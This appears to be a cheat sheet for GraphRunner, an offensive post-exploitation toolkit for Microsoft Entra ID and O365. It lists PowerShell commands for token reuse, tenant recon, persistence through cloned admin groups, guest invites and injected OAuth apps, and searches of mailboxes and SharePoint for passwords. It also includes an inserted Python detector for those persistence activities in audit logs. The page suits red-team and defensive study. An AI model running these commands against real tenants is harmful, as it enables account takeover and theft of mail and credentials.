GraphRunner

description

  • post-exploitation toolset for Microsoft Entra ID / O365
  • based upon the Microsoft Graph API

installation

PS> Import-Module .\GraphRunner.ps1
PS> Get-GraphTokens

usage

authentication

  • reuse authenticated tokens
  • device code or user creds
  • azure app auth
# should also set $tokens
PS> Get-GraphTokens

recon and enumeration

  • gather apps and consent approvals
  • dump conditional access policies
  • user/groups/sharepoint sites
PS> Invoke-GraphRecon
PS> Invoke-DumpCAPS -Tokens $tokens
PS> Invoke-DumpApps
 
# check if you can access other email addresses
PS> Invoke-GraphOpenInboxFinder -Tokens $tokens -userlist .\users.txt
 
# check if you can join any group
PS> Get-UpdatableGroups -Tokens $tokens
PS> Invoke-AddGroupMember -Tokens $tokens -GroupId id -userId user-id
 
# dynamic groups
PS> Get-DynamicGroups -Tokens $tokens

persistence

  • by default, any user is able to
    • create groups
    • invite guests
    • create apps
# clone a group with a name, copy other users to that, add your own user to it
# do this with 'administrators', 'site-admins'
PS> Invoke-SecurityGroupCloner
 
# guest users
PS> Invoke-InviteGuest
 
# oauth app
PS> Invoke-InjectOAuthApp
 
# will create $apptokens
PS> Invoke-GraphOpenInboxFinder -Tokens $apptokens -userlist .\userlist.txt
PS> Get-Inbox -Tokens $apptokens ...
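The defender's view of the persistence steps above: an added example (not GraphRunner code) that scans Entra ID audit-log records for the activity names those steps generate and flags an actor who performs several of them; the record layout follows the Graph directoryAudits shape (activityDisplayName, initiatedBy, targetResources), which is an assumption here, and the sample records are constructed.

```python
# Entra audit-log activityDisplayName values produced by the persistence steps above
PERSISTENCE_ACTIVITIES = {
    "Add group",              # Invoke-SecurityGroupCloner
    "Add member to group",    # Invoke-AddGroupMember
    "Invite external user",   # Invoke-InviteGuest
    "Add application",        # Invoke-InjectOAuthApp (registration)
    "Consent to application", # Invoke-InjectOAuthApp (consent grant)
}

# constructed sample records in the shape of Graph directoryAudits output (schema assumed)
SAMPLE_AUDIT = [
    {"activityDateTime": "2024-05-01T09:00:00Z", "activityDisplayName": "Add group",
     "initiatedBy": {"user": {"userPrincipalName": "alice@contoso.example"}},
     "targetResources": [{"displayName": "site-admins", "type": "Group"}]},
    {"activityDateTime": "2024-05-01T09:01:00Z", "activityDisplayName": "Add member to group",
     "initiatedBy": {"user": {"userPrincipalName": "alice@contoso.example"}},
     "targetResources": [{"displayName": "alice@contoso.example", "type": "User"}]},
    {"activityDateTime": "2024-05-01T09:05:00Z", "activityDisplayName": "Add application",
     "initiatedBy": {"user": {"userPrincipalName": "alice@contoso.example"}},
     "targetResources": [{"displayName": "HelpdeskSync", "type": "Application"}]},
    {"activityDateTime": "2024-05-01T10:00:00Z", "activityDisplayName": "Update user",
     "initiatedBy": {"user": {"userPrincipalName": "bob@contoso.example"}},
     "targetResources": [{"displayName": "carol@contoso.example", "type": "User"}]},
    {"activityDateTime": "2024-05-01T11:00:00Z", "activityDisplayName": "Invite external user",
     "initiatedBy": {"user": {"userPrincipalName": "bob@contoso.example"}},
     "targetResources": [{"displayName": "vendor@partner.example", "type": "User"}]},
]

def actor_of(record):
    """UPN of the initiating user, or the app name when a service principal acted."""
    by = record.get("initiatedBy") or {}
    user, app = by.get("user") or {}, by.get("app") or {}
    return user.get("userPrincipalName") or app.get("displayName") or "unknown"

def persistence_events(records):
    """(time, actor, activity, targets) for every record matching a persistence technique."""
    hits = []
    for r in records:
        name = r.get("activityDisplayName")
        if name in PERSISTENCE_ACTIVITIES:
            targets = ", ".join(t.get("displayName", "?") for t in r.get("targetResources", []))
            hits.append((r["activityDateTime"], actor_of(r), name, targets))
    return hits

def suspicious_actors(records, min_distinct=2):
    """Actors with >= min_distinct different persistence activities (group + member + app is the chain above)."""
    per_actor = {}
    for _, actor, name, _ in persistence_events(records):
        per_actor.setdefault(actor, set()).add(name)
    return {a: sorted(n) for a, n in per_actor.items() if len(n) >= min_distinct}
```

A single guest invite by itself stays below the threshold, while one account creating a group, joining it and registering an app within minutes is reported.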

Pillage

PS> Invoke-SearchMailbox -Tokens $tokens -SearchTerm "search term"
PS> Invoke-SearchTeams ...
PS> Invoke-SearchUserAttributes -Tokens $tokens -SearchTerm password
PS> Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm "password* and filetype:txt"
PS> Invoke-ImmersiveFileReader

Automate Stuff

PS> Invoke-GraphRunner

There is also a GUI

  • just a simple HTML site that can be opened with a browser

references